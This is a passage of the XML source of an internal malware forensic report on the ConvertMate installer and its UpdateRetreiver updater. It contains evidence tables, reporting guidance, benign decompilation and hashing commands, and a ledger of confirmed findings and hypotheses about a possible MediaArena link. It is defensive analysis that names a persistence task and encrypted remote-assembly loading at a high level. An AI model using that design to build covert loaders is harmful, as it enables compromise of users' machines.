    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Proof that the scheduled task registered and executed on the endpoint of interest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Complete chronology with acquisition timestamps, original installer provenance, username/device anonymized identifiers, and response actions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11.2 Suggested evidence collection matrix</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Evidence item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Question answered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Original Defender alert details</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Microsoft Defender incident/alert export</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Which file or behavior was called MediaArena?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Device process tree</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Defender timeline / EDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Who spawned the detected artifact?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Scheduled task XML/history</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Endpoint triage collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Did ConvertMateTask exist/run?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Updater process memory / EDR telemetry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Forensic memory capture/EDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Was a remote assembly actually loaded?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Extracted sample metadata/hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Forensic evidence repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Do file hashes corroborate archived samples?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Proxy/DNS records</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Network telemetry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Were listed domains contacted and when?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11.3 Reporting language guidance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Recommended: “Static analysis identified a scheduled updater with AES-decrypted remote .NET assembly loading capability. The delivered payload and relationship to the MediaArena detection have not been confirmed.” Avoid reporting that MediaArena definitely was downloaded, executed, or associated with a named attacker until corroborated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>12. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The available evidence supports a coherent account of ConvertMate functioning as a .NET software installer coupled with a scheduled updater. The updater obtains identity-specific authorization, requests encrypted updates, converts decrypted content to managed assembly bytes, and invokes assembly entry points within its own process. This combination presents substantial security risk and merits incident-response validation. Attribution to the MediaArena Trojan remains an open investigative question, not a settled finding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix A — Source anchors and reproduction commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>All source anchors below refer to the analyst’s ILSpy outputs in /home/kali; line numbers are specific to the displayed decompilation and may change across ILSpy versions.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Source area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Approx. line range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ConvertMate.decompiled.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>~943–965</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Remote config and FlowHandler fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ConvertMate.decompiled.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>~1050–1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>DownloadName condition, Chrome check, Convert Mate launch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ConvertMate.decompiled.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>~1125–1170</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Task registration condition and product extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ConvertMate.decompiled.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>~176320–176390</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>PowerShell script extraction and execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ConvertMate.decompiled.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>~176440–176545</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>GUID and Native.zip extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>UpdateRetreiver.decompiled.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>~38–108</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>UpdateManager.Load/Invoke and MD5 reporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>UpdateRetreiver.decompiled.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>~306–325</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>AES decryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>UpdateRetreiver.decompiled.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>~330–390</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Session info and update workflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>UpdateRetreiver.decompiled.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>~465–555</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Token acquisition and Info header</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>UpdateRetreiver.decompiled.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>~595–605</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Decrypted JSON into byte arrays</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>UpdateRetreiver.decompiled.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>~635–690</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Bearer token, InstallTime and Time headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Selected analyst commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="245"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="263648"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>ilspycmd -p -o ~/ConvertMate-Extracted ~/Desktop/ConvertMate.exe</w:t>
        <w:br/>
        <w:t>unzip -l ~/ConvertMate-Extracted/StructureV10Logic.Assets.Native.zip</w:t>
        <w:br/>
        <w:t>unzip -l ~/ConvertMate-Extracted/StructureV10Logic.Assets.Updating_files.zip</w:t>
        <w:br/>
        <w:t>cat ~/ConvertMate-Extracted/StructureV10Logic.Assets.conmate_update.ps1</w:t>
        <w:br/>
        <w:t>sha256sum ~/ConvertMate-Extracted/StructureV10Logic.Assets.*</w:t>
        <w:br/>
        <w:t>ilspycmd ~/ConvertMate-Updater/UpdateRetreiver.exe -o ~/ConvertMate-Updater-RE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix B — Analyst observation and interpretation ledger</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Observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Interpretation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Confidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Original assembly manifest embeds two ZIP files and PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Bundled installation/update packaging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Daily ConvertMateTask points to updater</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Persistence-capable task registration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Confirmed code/script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Response decrypt and JSON byte[][] parsing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Encrypted delivery of candidate managed assemblies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Confirmed code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>AppDomain.Load with EntryPoint.Invoke</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Reflective in-process execution capability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Confirmed code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No MediaArena string in initial filter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>No literal hit in inspected strings; not absence of family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>MediaArena dynamically delivered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Plausible but not verified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Hypothesis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616">
      <w:footerReference w:type="default" r:id="rId9"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1152" w:right="1800" w:bottom="1008" w:left="180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ConvertMate / UpdateRetreiver | Internal forensic analysis | 26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5A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